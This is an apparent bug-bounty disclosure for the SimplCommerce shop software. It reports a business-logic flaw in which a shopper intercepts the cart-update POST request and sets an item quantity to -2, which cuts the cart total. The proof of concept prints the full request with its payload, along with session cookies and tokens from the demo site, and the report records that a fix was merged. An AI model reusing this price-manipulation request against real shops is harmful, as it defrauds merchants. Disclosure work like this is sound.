Business Logic Errors in simplcommerce/simplcommerce

Valid

Reported on

Oct 22nd 2021


Description

SimplCommerce allows negative product allowing one to get products for free

The fix here https://github.com/simplcommerce/SimplCommerce/issues/971 does not work because client-side controls can by bypassed by modifying the POST request

Proof of Concept

1: Add one $75 and $25 item in cart.

2: Now go to cart and intercept the request via a proxy and modify the quantity of the $25 item to a negative number

POST /cart/update-item-quantity HTTP/1.1
Host: [SimplCommerce-URL]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-XSRF-TOKEN: CfDJ8BB4hZziqrxNrxPaeW2Vu_d_G73QObcBjoS1Y4UgGGG_pngxa7YaWEwWGAvHiwgqgbWudlRQA4Kc9X9b0MhTafFmZaUbRe0kHMa5_Zzc55nczSuikHqGoaVTuyIwewcscrNnYxKkev6Ugx-xtlwEXW7SWVtDxpTAJnsKhe0ECCh5_28-AXDumjN_mDtoXIV3qg
Request-Id: |pRtb5.391Gl
Request-Context: appId=cid-v1:de097dc4-1502-4412-8c78-7841be1a73ca
Content-Length: 35
Connection: close
Referer: https://demo.simplcommerce.com/cart
Cookie: SimplUserGuid=91f7b2d4-15a5-4a08-9ce4-00da2c66305d; .AspNetCore.Antiforgery.w5W7x28NAIs=CfDJ8BB4hZziqrxNrxPaeW2Vu_fsTHywY5Br5pCQ57dMzUuRg4fxgXa6fm-N1Gor6FSNlsWweJZXbjubBzprCzSp6SLR337WOpPkz95xI-dVjwjpeMlj0-W9ku50l4dj-xbQpYSBRFbdcS82dwHgJMu2vWI; ARRAffinity=16f852f05774947a25bec26c5259483bf2a73f782c2508294a7bdb89406aaf13; ARRAffinitySameSite=16f852f05774947a25bec26c5259483bf2a73f782c2508294a7bdb89406aaf13; ai_user=znO4m|2021-10-22T16:02:08.334Z; _ga=GA1.2.1639028580.1634918529; _gid=GA1.2.7867952.1634918529; ai_session=0lWcm|1634918528717|1634920904054; idsrv.session=ALatLXJs34-rHNZUd8goxw; .AspNetCore.Identity.Application=CfDJ8BB4hZziqrxNrxPaeW2Vu_fsFlvej2SWbsdrnmONGDgt-z9lSvaXNUi-oynMXEMkEDbMRM5pISutqfBFaI6yDLLg3R0-WzdzWkRGO4edSHJmhFGlDVhZpb6VZDTNvxEHM2dLK2LjHJw5P0Rl6WgjToK2YJvAP8VCC69cu9HK_VhayGDxFgrq_5gMPtch7fQvOJRIm533JApctyh60HXs5V1nhoRH_1Yo9_H-ctQM7FAlv9TGVPQ6lxNVulwW8RONrqR5AgicpGp1W7R3mHfYfzmKc5bWLoJk9_1eKbhgVLuzrJZmjg4zHe1veAGnpiagldgpNRtj_7M4Wo0fD3EumNvMuUv9YcyFJr1g4rnxygVIwtN1zhYK2g8hTgPFuEY0SCgpK28LtMIcvDasGVik98XvzOqwd5OD5L8Y8gWCZM0zKI17oNnQGgtSPWODAjWaPhoQPU2pB-C7tNu-LHkyZ-i22_-ZQi2R5SEF-6dUaEGbn0tWrJom4Wu4TWqXEFIcvVODc_KT-tJO4ia1u3n3HozITs-JyXP6hKGGTPlU0gWxWwTeVeblnm_sx-hcEUUrcPwVv5R38AJDWG7yXGIRJv4n9bfcrF5wpFFRsUMLWUd5ERZOu4qOk3qPvT4fHXYqtRdu1fUn9a5c3GexBLWMWgXvPGOrNRGOJg8rrNt-RDWrQSpugXx1HRl-8_vvLvKb5-0mdbBa19eDTxqb8U9MXCBdmFh2t3tr0tXg7ME3JdXR614A1Z-gLtYkatmXwhGpDH3dQyyCKG4mem_cS1bqb23shyreH5wE-wbrF-ZJJmFp1bI-YHwJxY955fbRFF7EwEO-ia6tHNcq_-fVQQv97DyPhrQYN1uDYe4AXF5ss4TJPxbKgiiKoOFCnQJ8qObK0ivf5SemKy4sg60QPVdQq-g7SViZwn16CY0V5brn3Tclu4t03zlnNFHNwU61Qz2vzrY2nsgcwO3HXa9goJe4ChT7o0v4M_DOiagtSDsAp3KKPdY6zb1CAx-Vbm9TPLTrXYd49ZyiqXeo_2K2njmQvJ0z6X0DOwOTMuXQiOSi5WAG; XSRF-TOKEN=CfDJ8BB4hZziqrxNrxPaeW2Vu_d_G73QObcBjoS1Y4UgGGG_pngxa7YaWEwWGAvHiwgqgbWudlRQA4Kc9X9b0MhTafFmZaUbRe0kHMa5_Zzc55nczSuikHqGoaVTuyIwewcscrNnYxKkev6Ugx-xtlwEXW7SWVtDxpTAJnsKhe0ECCh5_28-AXDumjN_mDtoXIV3qg

{"cartItemId":372127,"quantity":-2}

3: See that our $75 product now cost $25!

See following picture of a $75 product now costing $25 https://drive.google.com/file/d/1HIb1xp43IYTv7k9j8_S-BNQZa6DiWvrL/view?usp=sharing

Impact

This vulnerability is capable of...

Occurences

Quantity should be checked if its negative

Quantity should be checked if its negative

We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have contacted a member of the simplcommerce team and are waiting to hear back a month ago
We have sent a follow up to the simplcommerce team. We will try again in 7 days. a month ago
simplcommerce/simplcommerce maintainer validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
simplcommerce/simplcommerce maintainer confirmed that a fix has been merged on 2bce25 a month ago
The fix bounty has been dropped
CartController.cs#L97L131 has been validated
CartController.cs#L46L80 has been validated